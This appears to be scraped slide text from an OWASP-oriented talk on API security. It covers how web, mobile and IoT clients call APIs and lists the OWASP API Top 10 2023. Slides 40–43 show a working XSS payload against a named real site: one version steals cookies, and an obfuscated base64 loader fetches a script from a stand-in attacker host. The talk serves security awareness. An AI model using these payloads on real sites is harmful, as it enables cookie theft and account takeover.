Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
 

Web Apps APIs' Nightmare Guide

  • 2. ● Security Researcher/Pentester ● 15+ years as a Software Developer ● Long-term OWASP Volunteer ● Strong believer in spreading security awareness Who Am I Paulo Silva @pauloasilva_com /devpauloasilva paulo@char49.com Web Apps: APIs’ Nightmare
  • 4.
  • 5.
  • 6.
  • 7. Web Apps: APIs’ Nightmare Traditional Web Applications Client Server GET / Content-Type: text/html HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . php index.php login.php . . .
  • 8. Web Apps: APIs’ Nightmare Traditional Web Applications Client Server HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . GET /scripts/main.js Content-Type: application/javascript GET / Content-Type: text/html php index.php login.php . . .
  • 9. Web Apps: APIs’ Nightmare Traditional Web Applications Client Server HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . GET /style/display.css Content-Type: text/css GET /scripts/main.js Content-Type: application/javascript GET / Content-Type: text/html php index.php login.php . . .
  • 10. Web Apps: APIs’ Nightmare Traditional Web Applications Client Server HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . GET /style/display.css Content-Type: text/css ... GET /scripts/main.js Content-Type: application/javascript GET / Content-Type: text/html php index.php login.php . . .
  • 11. Web Apps: APIs’ Nightmare Traditional Web Applications Client Server HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . php index.php . . . ... GET /login.php Content-Type: text/html GET /style/display.css Content-Type: text/css GET /scripts/main.js Content-Type: application/javascript GET / Content-Type: text/html php index.php login.php . . .
  • 12. Web Apps: APIs’ Nightmare Traditional Web Applications Client Server HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . php index.php . . . ... GET /login.php Content-Type: text/html GET /style/display.css Content-Type: text/css GET /scripts/main.js Content-Type: application/javascript php index.php login.php . . . POST /login.php Content-Type: text/html
  • 13.
  • 14. Web Apps: APIs’ Nightmare Mobile Applications Client Server POST /login Content-Type: application/json HTTP PHP Database . . . php auth.php users.php posts.php comments.php . . .
  • 15. Web Apps: APIs’ Nightmare Mobile Applications Client Server POST /login Content-Type: application/json HTTP PHP Database GET /users/me Content-Type: application/json . . . php auth.php users.php posts.php comments.php . . . Mobile Applications
  • 16. Web Apps: APIs’ Nightmare Traditional Web Applications Client Server POST /login Content-Type: application/json HTTP PHP Database . . . php auth.php users.php GET /users/me Content-Type: application/json GET /posts/ Content-Type: application/json posts.php comments.php . . . Mobile Applications
  • 17. Web Apps: APIs’ Nightmare Client Server POST /login Content-Type: application/json HTTP PHP Database . . . php auth.php users.php GET /users/me Content-Type: application/json GET /posts/ Content-Type: application/json posts.php comments.php ... . . . Mobile Applications
  • 18. Web Apps: APIs’ Nightmare
  • 19. Web Apps: APIs’ Nightmare
  • 20. Web Apps: APIs’ Nightmare Connected Things Client Server GET /device/config Content-Type: application/json HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ...
  • 21. Web Apps: APIs’ Nightmare Client Server GET /device/config Content-Type: application/json HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... POST /device/auth Content-Type: application/json Internet of Things Connected Things
  • 22. Web Apps: APIs’ Nightmare Traditional Web Applications Client Server GET /device/config Content-Type: application/json HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... POST /device/auth Content-Type: application/json POST /location Content-Type: application/json Internet of Things Connected Things
  • 23. Web Apps: APIs’ Nightmare Client Server GET /device/config Content-Type: application/json HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... POST /device/auth Content-Type: application/json POST /location Content-Type: application/json ... Connected Things
  • 24. Web Apps: APIs’ Nightmare Modern Web Applications Client Server GET / Content-Type: text/html HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... public index.html bundle.js ...
  • 25. Web Apps: APIs’ Nightmare Client Server GET / Content-Type: text/html HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... public index.html bundle.js ... GET /bundle.js Content-Type: application/javascript Modern Web Applications
  • 26. Web Apps: APIs’ Nightmare Client Server GET / Content-Type: text/html HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... public index.html bundle.js ... GET /bundle.js Content-Type: application/javascript POST /login Content-Type: application/json Modern Web Applications
  • 27. Web Apps: APIs’ Nightmare Client Server GET / Content-Type: text/html HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... public index.html bundle.js ... GET /bundle.js Content-Type: application/javascript POST /login Content-Type: application/json ... Modern Web Applications GET /places/1234 Content-Type: application/json
  • 28. Web Apps: APIs’ Nightmare Client Server GET / Content-Type: text/html HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... public index.html bundle.js ... GET /bundle.js Content-Type: application/javascript POST /login Content-Type: application/json ... Modern Web Applications GET /places/1234 Content-Type: application/json ...
  • 29. Web Apps: APIs’ Nightmare OWASP API Security Top 10 API1:2023 Broken Object-Level Authorization API2:2023 Broken Authentication API3:2023 Broken Object Property Level Authorization API4:2023 Unrestricted Resource Consumption API5:2023 Broken Function-Level Authorization API6:2023 Unrestricted Access to Sensitive Business Flows API7:2023 Server Side Request Forgery API8:2023 Security Misconfiguration API9:2023 Improper Inventory Management API10:2023 Unsafe Consumption of APIs
  • 30. API API API API API API API API API API API API API Web Apps: APIs’ Nightmare API
  • 31.
  • 32.
  • 33.
  • 34.
  • 35.
  • 36.
  • 37.
  • 38.
  • 39.
  • 40. Web Apps: APIs’ Nightmare Vulnerable Parameter Cross-Site Scripting https://campaigns.porsche.com/charging/WebAjaxGet? OpenAgent&typ=nummer&la=USen&pid=95998FB59237DF92C12586D800 37659B 111&ke=6546546<img src=x onerror=alert(document.cookie)>
  • 41. Web Apps: APIs’ Nightmare Loader Payload Cross-Site Scripting
  • 42. Web Apps: APIs’ Nightmare Payload Payload https://campaigns.porsche.com/charging/WebAjaxGet? OpenAgent&typ=nummer&la=USen&pid=95998FB59237DF92C12586D800 37659B 111&ke=6546546<img src=x onerror=eval(atob(“KCgpID0+IHsKICBjb25zdCBzY3JpcHQgPSBkb2N1b WVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTsKICBzY3JpcHQuc3JjID 0gJ2h0dH BzOi8vYXR0YWNrZXIuY29tL2V4ZmlsdHJhdGUuanMnOwogIGRvY3VtZW5 0LmJvZHk uYXBwZW5kQ2hpbGQoc2NyaXB0KTsKfSkoKQ==”))> Payload Cross-Site Scripting
  • 43. Web Apps: APIs’ Nightmare Malicious Script HTTP Fundamentals Payload Cross-Site Scripting
  • 44.
  • 45.
  • 46. Web Apps: APIs’ Nightmare OWASP Resources Other References ● OWASP API Security Project ● OWASP API Security Top 10 2023 ● OWASP API Security Top 10 2019 ● Goats ● OWASP Vulnerable Web Applications Directory ● OWASP crAPI - Completely Ridiculous API ● OWASP Juice Shop ● OWASP Cheat Sheets Series ● Authentication Cheat Sheet ● Authorization Cheat Sheet ● GraphQL Cheat Sheet ● REST Security Cheat Sheet ● Web Service Security Cheat Sheet ● OWASP Secure Coding Practices-Quick Reference Guide ● OWASP Go Secure Coding Practices Guide ● HTTP ● Basic of HTTP - mdn web docs ● Cross-Origin Resource Sharing (CORS) - mdn web docs ● API Protocols ● REST ● Representational state transfer - Wikipedia ● Representational State Transfer (REST) - Fielding Dissertation ● RPC ● Remote procedure call - Wikipedia ● OpenRPC ● JSON-RPC ● XML-RPC ● gRPC ● GraphQL ● Introduction to GraphQL ● GraphQL blogposts Series - Checkmarx ● Rate Limiting GraphQL APIs by Calculating Query Complexity - Shopify ● MindAPI ● MindAPI References
  • 47. Web Apps: APIs’ Nightmare OWASP Resources Other References